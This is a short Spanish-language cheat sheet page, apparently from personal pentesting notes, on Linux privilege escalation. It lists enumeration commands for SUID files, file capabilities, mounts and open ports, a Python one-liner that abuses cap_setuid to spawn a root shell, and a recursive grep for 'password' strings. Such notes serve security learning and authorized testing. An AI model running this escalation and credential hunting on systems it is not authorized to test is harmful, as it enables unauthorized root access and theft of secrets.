search

Privilege Escalation

hashtag
Tools

Buscar archivos con bit SUID activado que el owner sea el usuario root

find / -type f -perm -4000 -user root 2>/dev/null

Listar recursivamente las capabilities asignadas a archivos del sistema

getcap -r / 2>/dev/null

Listar todos los sistemas de archivos actualmente montados

mount

hashtag
Explotar cap_setuid

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Grepear archivos de forma recursiva ignorando mayúsculas/minúsculas, mostrando el número de línea, resaltando el string buscado con color y mostrando dos líneas previas y posteriores

grep -Rin --color=auto -C 2 "password" --exclude-dir=node_modules <directorio>

Listar puertos abiertos

ss -tulnp
netstat -tulnp

Ver el buzón de correo de los usuarios del sistema

PreviousPort fordwardingNextPython

Last updated